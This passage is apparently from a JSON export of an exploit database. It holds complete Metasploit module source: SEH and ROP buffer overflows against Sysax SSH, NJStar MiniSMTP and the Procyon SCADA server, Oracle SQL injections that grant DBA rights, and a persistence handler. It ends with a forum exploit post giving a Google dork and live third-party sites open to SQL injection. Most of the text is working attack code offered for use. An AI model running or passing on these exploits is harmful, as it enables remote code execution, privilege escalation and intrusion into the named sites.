options for module\n mh = client.framework.exploits.create('multi/handler')\n mh.share_datastore(pay.datastore)\n mh.datastore['WORKSPACE'] = client.workspace\n mh.datastore['PAYLOAD'] = payload_name\n mh.datastore['EXITFUNC'] = 'thread'\n mh.datastore['ExitOnSession'] = true\n # Validate module options\n mh.options.validate(mh.datastore)\n # Execute showing output\n mh.exploit_simple(\n 'Payload' => mh.datastore['PAYLOAD'],\n 'LocalInput' => self.user_input,\n 'LocalOutput' => self.user_output,\n 'RunAsJob' => true\n )\n\n # Check to make sure that the handler is actually valid\n # If another process has the port open, then the handler will fail\n # but it takes a few seconds to do so. The module needs to give\n # the handler time to fail or the resulting connections from the\n # target could end up on on a different handler with the wrong payload\n # or dropped entirely.\n Rex.sleep(5)\n return nil if framework.jobs[mh.job_id.to_s].nil?\n\n return mh.job_id.to_s\n else\n print_error('A job is listening on the same local port')\n return nil\n end\n end\n\n # Method for checking if a listener for a given IP and port is present\n # will return true if a conflict exists and false if none is found\n def check_for_listener(lhost, lport)\n client.framework.jobs.each do |k, j|\n if j.name =~ / multi\\/handler/\n current_id = j.jid\n current_lhost = j.ctx[0].datastore['LHOST']\n current_lport = j.ctx[0].datastore['LPORT']\n if lhost == current_lhost && lport == current_lport.to_i\n print_error(\"Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}\")\n return true\n end\n end\n end\n false\n end\n\n # Function for creating log folder and returning log path\n def log_file(log_path = nil)\n # Get hostname\n host = session.sys.config.sysinfo[\"Computer\"]\n\n # Create Filename info to be appended to downloaded files\n filenameinfo = \"_\" + ::Time.now.strftime(\"%Y%m%d.%M%S\")\n\n # Create a directory for the logs\n if log_path\n logs = ::File.join(log_path, 'logs', 'persistence',\n Rex::FileUtils.clean_path(host + filenameinfo))\n else\n logs = ::File.join(Msf::Config.log_directory, 'persistence',\n Rex::FileUtils.clean_path(host + filenameinfo))\n end\n\n # Create the log directory\n ::FileUtils.mkdir_p(logs)\n\n # logfile name\n logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + \".rc\"\n logfile\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/persistence.rb"}, {"lastseen": "2019-12-07T09:32:12", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Sysax's SSH service. By supplying a long username, the SSH server will copy that data on the stack without proper bounds checking, therefore allowing remote code execution under the context of the user. Please note that previous versions (before 5.53) are also affected by this bug.\n", "modified": "2018-08-15T21:54:41", "published": "2012-03-03T16:11:51", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_DATAPROTECTOR_INSTALL_SERVICE", "href": "", "type": "metasploit", "title": "Sysax 5.53 SSH Username Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::SSH\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => \"Sysax 5.53 SSH Username Buffer Overflow\",\n 'Description' => %q{\n This module exploits a vulnerability found in Sysax's SSH service. By\n supplying a long username, the SSH server will copy that data on the stack\n without proper bounds checking, therefore allowing remote code execution\n under the context of the user. Please note that previous versions\n (before 5.53) are also affected by this bug.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Craig Freyman', # Initial discovery, PoC\n 'sinn3r' # Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '79689'],\n ['URL', 'http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html'],\n ['EDB', '18535']\n ],\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\\x3a\",\n 'StackAdjustment' => -3500\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"seh\"\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Sysax 5.53 on Win XP SP3 / Win2k3 SP0',\n {\n 'Rop' => false,\n 'Ret' => 0x00402669 # POP/POP/RET - sysaxservd.exe\n }\n ],\n [\n 'Sysax 5.53 on Win2K3 SP1/SP2',\n {\n 'Rop' => true,\n 'Ret' => 0x0046d23c # ADD ESP, 0F8C # RETN\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Feb 27 2012\",\n 'DefaultTarget' => 0\n )\n )\n\n register_options(\n [ OptInt.new('RPORT', [false, 'The target port', 22]) ]\n )\n end\n\n def check\n begin\n connect\n banner = sock.get_once(-1, 5) || ''\n disconnect\n vprint_status(\"Banner: #{banner}\")\n if banner.match?(/SSH\\-2\\.0\\-SysaxSSH_1\\.0/)\n return Exploit::CheckCode::Appears\n end\n rescue\n vprint_error(\"An error has occurred while trying to read a response from target\")\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Safe\n end\n\n def generate_regular_exploit\n #\n # Align the stack to the beginning of the fixed size payload\n #\n align = \"\\x54\" # PUSH ESP\n align << \"\\x58\" # POP EAX\n align << \"\\x04\\x08\" # ADD AL,0x08\n align << \"\\x8b\\x18\" # MOV EBX, [EAX]\n align << \"\\x93\" # XCHG EAX,EBX\n align << \"\\x66\\x2d\\x10\\x04\" # SUB AX,0x361\n align << \"\\x50\" # PUSH EAX\n align << \"\\xc3\" # RET\n\n #\n # Our payload limited to 1024+4 bytes\n #\n p = make_nops(4)\n p << payload.encoded\n\n #\n # Craft the buffer like this:\n # [392 bytes][20 bytes][< 9404 bytes][payload][alignment][nseh][seh]\n # * The 20-byte region is where our source IP is written. 20 bytes gives it enough room\n # for the IP length, so the next 9404-byte space will begin at a consistent place.\n # * After SEH, we have ~1860 bytes, but we don't need that because we're doing a\n # partial-overwrite to allow a null byte in SEH.\n #\n buf = ''\n buf << rand_text(392, payload_badchars)\n buf << rand_text(20, payload_badchars)\n buf << rand_text(9204 - buf.length - align.length - p.length, payload_badchars) # 8796+392+20\n buf << p\n buf << align\n buf << \"\\xeb\" + [0 - align.length - 2].pack('c') + make_nops(2) # Short jmp back\n buf << [target.ret].pack('V*')\n buf\n end\n\n def generate_rop_exploit\n junk = rand_text(4).unpack(\"L\")[0].to_i\n nop = make_nops(4).unpack(\"L\")[0].to_i\n\n # !mona rop -m msvcrt\n p =\n [\n 0x77bb2563, # POP EAX # RETN\n 0x77ba1114, # <- *&VirtualProtect()\n 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\n junk,\n 0x77bb0c86, # XCHG EAX,ESI # RETN\n 0x77bc9801, # POP EBP # RETN\n 0x77be2265, # ptr to 'push esp # ret'\n 0x77bb2563, # POP EAX # RETN\n 0x03C0990F,\n 0x77bdd441, # SUB EAX, 03c0940f\n 0x77bb48d3, # POP EBX, RET\n 0x77bf21e0, # .data\n 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN\n 0x77bbfc02, # POP ECX # RETN\n 0x77bef001, # W pointer (lpOldProtect) (-> ecx)\n 0x77bd8c04, # POP EDI # RETN\n 0x77bd8c05, # ROP NOP (-> edi)\n 0x77bb2563, # POP EAX # RETN\n 0x03c0984f,\n 0x77bdd441, # SUB EAX, 03c0940f\n 0x77bb8285, # XCHG EAX,EDX # RETN\n 0x77bb2563, # POP EAX # RETN\n nop,\n 0x77be6591, # PUSHAD # ADD AL,0EF # RETN\n ].pack(\"V*\")\n\n p << payload.encoded\n\n #\n # Similar buffer structure to generate_regular_exploit\n #\n buf = ''\n buf << rand_text(392, payload_badchars)\n buf << rand_text(20, payload_badchars)\n buf << rand_text(1012, payload_badchars)\n buf << p\n buf << rand_text(9204 - buf.length)\n buf << rand_text(4, payload_badchars)\n buf << [target.ret].pack('V*')\n buf\n end\n\n def exploit\n #\n # Create buffer based on target (DEP or no DEP)\n # If possible, we still prefer to use the regular version because it's more stable\n #\n if target['Rop']\n buf = generate_rop_exploit\n else\n buf = generate_regular_exploit\n end\n\n #\n # Send the malicious buffer\n #\n pass = rand_text_alpha(8)\n begin\n print_status(\"Sending malicious request to #{rhost}:#{rport}...\")\n factory = ssh_socket_factory\n ssh = Net::SSH.start(\n datastore['RHOST'],\n buf,\n password: pass,\n port: datastore['RPORT'],\n timeout: 1,\n proxy: factory,\n config: false,\n non_interactive: true,\n verify_host_key: :never\n )\n\n ::Timeout.timeout(1) { ssh.close }\n rescue Errno::ECONNREFUSED\n print_error(\"Cannot establish a connection on #{rhost}:#{rport}\")\n return\n rescue StandardError => e\n if e.message.match?(/fingerprint [0-9a-z\\:]+ does not match/)\n print_error(\"Please remove #{rhost}:#{rport} from your known_hosts list\")\n return\n end\n end\n\n handler(ssh)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ssh/sysax_ssh_username.rb"}, {"lastseen": "2019-11-06T13:34:17", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow vulnerability in NJStar Communicator Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple NJStar products, and will continue to run in the background even if the software is already shutdown. According to the vendor's testimonials, NJStar software is also used by well known companies such as Siemens, NEC, Google, Yahoo, eBay; government agencies such as the FBI, Department of Justice (HK); as well as a long list of universities such as Yale, Harvard, University of Tokyo, etc.\n", "modified": "2017-07-24T13:26:21", "published": "2011-11-01T08:19:55", "id": "MSF:EXPLOIT/WINDOWS/SMTP/NJSTAR_SMTP_BOF", "href": "", "type": "metasploit", "title": "NJStar Communicator 3.00 MiniSMTP Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Egghunter\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NJStar Communicator 3.00 MiniSMTP Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow vulnerability in NJStar Communicator\n Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple\n NJStar products, and will continue to run in the background even if the\n software is already shutdown. According to the vendor's testimonials,\n NJStar software is also used by well known companies such as Siemens, NEC,\n Google, Yahoo, eBay; government agencies such as the FBI, Department of\n Justice (HK); as well as a long list of universities such as Yale, Harvard,\n University of Tokyo, etc.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Dillon Beresford', # Original discovery and MSF Module.\n ],\n 'References' =>\n [\n [ 'OSVDB', '76728' ],\n [ 'CVE', '2011-4040' ],\n [ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],\n [ 'EDB', '18057' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -1500,\n },\n 'Targets' =>\n [\n [\n 'Windows XP SP2/SP3',\n {\n 'Ret' => 0x77c35459, # PUSH ESP; RETN (MSVCRT.dll)\n 'Offset' => 247,\n }\n ],\n [\n # Can't test patch level on this one, because you can't\n # even update Win2k3 SP0 anymore from Windows Update\n 'Windows Server 2003 SP0',\n {\n 'Ret' => 0x77d20738, # JMP ESP (USER32.dll)\n 'Offset' => 247,\n }\n ],\n [\n 'Windows Server 2003 SP1/SP2',\n {\n 'Ret' => 0x77BE2265, # PUSH ESP; RETN (MSVCRT.dll)\n 'Offset' => 247,\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 31 2011',\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(25)])\n end\n\n def check\n connect\n # We get a response like: \"220 [host-name] Service Ready\"\n # But we don't really care about this one\n res = sock.get_once(-1, 5)\n vprint_status(\"Banner: #{res.to_s.chop}\")\n\n sock.puts(\"HELP\\r\\n\")\n\n # But the HELP response will tell us if this is a NJStar SMTP or not\n res = sock.get_once(-1, 5)\n vprint_status(\"HELP Response: #{res.to_s.chop}\")\n disconnect\n\n # I can only flag it as \"Detected\" because it doesn't return a version\n if res =~ /Windows E-mail Server From NJStar Software/i\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n eggoptions =\n {\n :checksum => true,\n :eggtag => \"w00t\"\n }\n\n hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)\n\n buffer = rand_text(target['Offset'])\n buffer << [target.ret].pack('V')\n buffer << hunter\n buffer << make_nops(4)\n\n # Just some debugging output so we can see lengths and byte size of each of our buffer.\n vprint_status(\"egg: %u bytes: \\n\" % egg.length + Rex::Text.to_hex_dump(egg))\n vprint_status(\"hunter: %u bytes: \\n\" % hunter.length + Rex::Text.to_hex_dump(hunter))\n vprint_status(\"buffer: %u bytes:\\n\" % buffer.length + Rex::Text.to_hex_dump(buffer))\n\n print_status(\"Trying target #{target.name}...\")\n\n # har har har you get trick no treat...\n # we dont have very much space so we\n # send our egg in a seperate connection\n connect\n\n print_status(\"Sending the egg...\")\n sock.put(egg)\n\n # I think you betta call, ghostbusters...\n # now we send our evil buffer along with the\n # egg hunter, we are doing multiple connections\n # to solve the issue with limited stack space.\n # thanks to bannedit for advice on threads and\n # making multiple connections to get around\n # stack space constraints. :)\n connect\n\n print_status(\"Sending our buffer containing the egg hunter...\")\n sock.put(buffer)\n\n handler\n disconnect\n end\nend\n\n\n=begin\nDillon Beresford\nhttps://twitter.com/#!/D1N\n\nNJStar Communicator\nVersion: 3.00 and prior\nBuild: 11818 and prior\n\nTested minismtp version:\n1.30.0.60218\n\nShouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,\nmanils, d0tslash, mublix, halsten, and everyone at AHA!\n\nNo response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded\non 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability\nis remotely exploitable and needed more verification. I sent a proof of concept exploit\nin python with remote code execution. So, here is the proof that the bug is, in fact,\nremotely exploitable. WIN!\n\nSystem DLLs are used for target.ret because minismtp.exe is the only NJStar component in\nmemory, and its base starts with a 0x00, that's no good. However, if your target machine\nstarted minismtp from the Windows start menu (Start -> All Programs -> NJStar Communicator\n-> NJStar MiniSmtp), it'd actually load up more DLLs. And one of them -- MSVCR100.dll -- is\nideal enough to use (No rebase, starts with a high address, but there is an ASLR flag).\n\neax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50\nedi=008a3d80\neip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc\ncs=001b\t ss=0023 ds=0023 es=0023\tfs=003b\t gs=0000\nefl=00010206\n42424242 ?? ???\n0:003> !exchain\nimage00400000+bbc4 (0040bbc4)\n00ccff00: 41414141\nInvalid exception stack at 41414141\n0:003> d esp\n00ccff70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD\n00ccff80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD\n00ccff90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD\n00ccffa0 44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00 DDDD......@. #A.\n00ccffb0 00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00 ........)..|.=..\n00ccffc0 00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f .........=......\n00ccffd0 00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff ................\n00ccffe0 d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00 ...|0..|........\n\n=end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smtp/njstar_smtp_bof.rb"}, {"lastseen": "2019-12-04T10:05:44", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the coreservice.exe component of Proycon Core Server <= v1.13. While processing a password, the application fails to do proper bounds checking before copying data into a small buffer on the stack. This causes a buffer overflow and allows to overwrite a structured exception handling record on the stack, allowing for unauthenticated remote code execution. Also, after the payload exits, Coreservice.exe should automatically recover.\n", "modified": "2017-07-24T13:26:21", "published": "2011-09-12T17:54:31", "id": "MSF:EXPLOIT/WINDOWS/SCADA/PROCYON_CORE_SERVER", "href": "", "type": "metasploit", "title": "Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow\",\n 'Description' => %q{\n This module exploits a vulnerability in the coreservice.exe component of Proycon\n Core Server <= v1.13. While processing a password, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows to overwrite a structured exception handling\n record on the stack, allowing for unauthenticated remote code execution. Also, after the\n payload exits, Coreservice.exe should automatically recover.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Knud Hojgaard <keh[at]nsense.dk>', # Initial discovery\n 'mr_me <steventhomasseeley[at]gmail.com>', # Initial discovery & poc/msf\n ],\n 'References' =>\n [\n ['CVE', '2011-3322'],\n ['OSVDB', '75371'],\n ['URL', 'http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x0a\\x0d\",\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n\n [\n 'Windows XP SP3 - No dep bypass',\n {\n 'Ret' => 0x774699bf, # JMP ESP [user32.dll]\n 'Edx' => 0x1D847770, # 0x7712dec2 -> 0x00700040 RW [oleaut32.dll]\n 'Eax' => 0x01010106, # 0x7712dec2 -> 0x00700040 RW [oleaut32.dll]\n 'Offset' => 8\n }\n ],\n ],\n 'Privileged' => true,\n 'DisclosureDate' => \"Sep 08 2011\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(23)\n ])\n end\n\n def check\n connect\n res = (sock.get_once || '').chomp #This gives us string \"----------------------------\"\n res = (sock.get_once || '').chomp #This gives us the actual software version\n disconnect\n\n if res =~ /Core Command Interface V1\\.(.*)2/\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n\n eggoptions =\n {\n :checksum => false,\n :eggtag => 'ssec',\n }\n\n badchars = \"\\x00\\x0a\\x0d\"\n hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)\n\n sploit = rand_text_alpha_upper(45)\n sploit << [target['Edx']].pack('V')\n sploit << [0x41414141].pack('V')\n sploit << [target['Eax']].pack('V')\n sploit << rand_text_alpha_upper(target['Offset'])\n sploit << [target.ret].pack('V')\n sploit << make_nops(10)\n sploit << hunter\n sploit << rand_text_alpha_upper(500)\n sploit << egg\n sploit << \"\\r\\n\"\n\n connect\n sock.get_once()\n print_status(\"Sending request...\")\n sock.put(sploit)\n handler()\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/scada/procyon_core_server.rb"}, {"lastseen": "2019-10-20T17:49:32", "bulletinFamily": "exploit", "description": "This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.DBMS_METADATA.OPEN package/function.\n", "modified": "2017-07-24T13:26:21", "published": "2009-07-28T13:43:37", "id": "MSF:AUXILIARY/SQLI/ORACLE/DBMS_METADATA_OPEN", "href": "", "type": "metasploit", "title": "Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN',\n 'Description' => %q{\n This module will escalate a Oracle DB user to DBA by exploiting an sql injection\n bug in the SYS.DBMS_METADATA.OPEN package/function.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.metasploit.com' ],\n ],\n 'DisclosureDate' => 'Jan 5 2008'))\n\n register_options(\n [\n OptString.new('SQL', [ false, 'SQL to execute.', \"GRANT DBA to #{datastore['DBUSER']}\"]),\n ])\n end\n\n def run\n return if not check_dependencies\n\n name = Rex::Text.rand_text_alpha(rand(10) + 1)\n\n function = \"\n create or replace function #{datastore['DBUSER']}.#{name} return varchar2\n authid current_user is pragma autonomous_transaction;\n begin\n execute immediate '#{datastore['SQL']}';\n return '';\n end;\n \"\n\n package = \"select sys.dbms_metadata.open('''||#{datastore['DBUSER']}.#{name}()||''') from dual\"\n\n clean = \"drop function #{name}\"\n\n\n print_status(\"Sending function...\")\n prepare_exec(function)\n\n begin\n print_status(\"Attempting sql injection on SYS.DBMS_METADATA.OPEN...\")\n prepare_exec(package)\n rescue ::OCIError => e\n if ( e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/ )\n print_status(\"Removing function '#{name}'...\")\n prepare_exec(clean)\n else\n end\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/sqli/oracle/dbms_metadata_open.rb"}, {"lastseen": "2019-11-20T21:04:13", "bulletinFamily": "exploit", "description": "This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function.\n", "modified": "2017-08-29T00:17:58", "published": "2009-07-28T13:43:37", "id": "MSF:AUXILIARY/SQLI/ORACLE/DBMS_METADATA_GET_GRANTED_XML", "href": "", "type": "metasploit", "title": "Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML',\n 'Description' => %q{\n This module will escalate an Oracle DB user to DBA by exploiting a sql injection\n bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.metasploit.com' ],\n ],\n 'DisclosureDate' => 'Jan 5 2008'))\n\n register_options(\n [\n OptString.new('SQL', [ false, 'SQL to execute.', \"GRANT DBA to #{datastore['DBUSER']}\"]),\n ])\n end\n\n def run\n return if not check_dependencies\n\n name = Rex::Text.rand_text_alpha(rand(10) + 1)\n\n function = \"\n create or replace function #{datastore['DBUSER']}.#{name} return varchar2\n authid current_user is pragma autonomous_transaction;\n begin\n execute immediate '#{datastore['SQL']}';\n return '';\n end;\n \"\n\n package = \"select sys.dbms_metadata.get_granted_xml('''||#{datastore['DBUSER']}.#{name}()||''') from dual\"\n\n clean = \"drop function #{name}\"\n\n print_status(\"Sending function...\")\n prepare_exec(function)\n\n begin\n print_status(\"Attempting sql injection on SYS.DBMS_METADATA.GET_GRANTED_XML...\")\n prepare_exec(package)\n rescue ::OCIError => e\n print_status(\"Removing function '#{name}'...\")\n prepare_exec(clean)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb"}, {"lastseen": "2019-12-01T17:45:46", "bulletinFamily": "exploit", "description": "This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.DBMS_METADATA.GET_XML package/function.\n", "modified": "2017-08-29T00:17:58", "published": "2009-07-28T13:43:37", "id": "MSF:AUXILIARY/SQLI/ORACLE/DBMS_METADATA_GET_XML", "href": "", "type": "metasploit", "title": "Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML',\n 'Description' => %q{\n This module will escalate an Oracle DB user to DBA by exploiting a sql injection\n bug in the SYS.DBMS_METADATA.GET_XML package/function.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.metasploit.com' ],\n ],\n 'DisclosureDate' => 'Jan 5 2008'))\n\n register_options(\n [\n OptString.new('SQL', [ false, 'SQL to execute.', \"GRANT DBA to #{datastore['DBUSER']}\"]),\n ])\n end\n\n def run\n return if not check_dependencies\n\n name = Rex::Text.rand_text_alpha(rand(10) + 1)\n\n function = \"\n create or replace function #{datastore['DBUSER']}.#{name} return varchar2\n authid current_user is pragma autonomous_transaction;\n begin\n execute immediate '#{datastore['SQL']}';\n return '';\n end;\n \"\n\n package = \"select sys.dbms_metadata.get_xml('''||#{datastore['DBUSER']}.#{name}()||''','') from dual\"\n\n clean = \"drop function #{name}\"\n\n print_status(\"Sending function...\")\n prepare_exec(function)\n\n begin\n print_status(\"Attempting sql injection on SYS.DBMS_METADATA.GET_XML...\")\n prepare_exec(package)\n rescue ::OCIError => e\n print_status(\"Removing function '#{name}'...\")\n prepare_exec(clean)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb"}], "zdt": [{"lastseen": "2018-03-01T21:38:56", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-09-11T00:00:00", "published": "2012-09-11T00:00:00", "id": "1337DAY-ID-19383", "href": "https://0day.today/exploit/description/19383", "type": "zdt", "title": "ANTEMENE SQL Injection Vulnerability", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ######################################### 1\r\n0 I'm TUNISIAN CYBER member from Inj3ct0r Team 1\r\n1 ######################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n[+] Author: TUNISIAN CYBER\r\n[+] Home: 1337day.com Inj3ct0r Exploit DataBase\r\n[+] Exploit Title: ANTEMENE SQL Injection Vulnerability\r\n[+] Date: 10-09-2012\r\n[+] Category: WebApp\r\n[+] Google Dork: intext:\"Cr\u00e9ation internet et r\u00e9f\u00e9rencement web / Agence web \" article.php\r\n[+] Tested on: Windows 7 Professionnel / Windows Server 2008\r\n[+] Vendor: http://www.antemene.com\r\n\r\n\r\n########################################################################################\r\n\r\nProof:\r\n127.0.0.1/article.php?id=[SQLi]\r\n127.0.0.1/article.php?id_categorie=&id_article[SQLi]\r\n\r\nDemos:\r\nhttp://www.destination-piscine.com/m_catalogue/article.php?id=4'\r\nhttp://www.domaine-usseglio.fr/m_vin/article.php?id_categorie=&id_article=3'\r\nhttp://www.vins-saint-saturnin.com/m_vin/article.php?id_categorie=3&id_article=39'\r\nhttp://www.costieres.com/m_vin/article.php?id_categorie=2&id_article=26'\r\nhttp://www.cave-vauvert.com/m_vin/article.php?id_categorie=2&id_article=6'\r\nhttp://www.vignerons-castelas.com/m_vin/article.php?id_categorie=&id_article=13'\r\nhttp://www.bulbargence.com/m_catalogue/article.php?id_categorie=89&id_article=48'\r\nhttp://www.sasvp.com/m_catalogue/article.php?id_categorie=14&id_article=11'\r\n\r\nMore in Google =)\r\n\r\n########################################################################################\r\nGreets to: TN H4CK3RZ , r00tw0rm members and Inj3ct0r Team\r\n###########################################################################################\r\n\r\n\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19383"}, 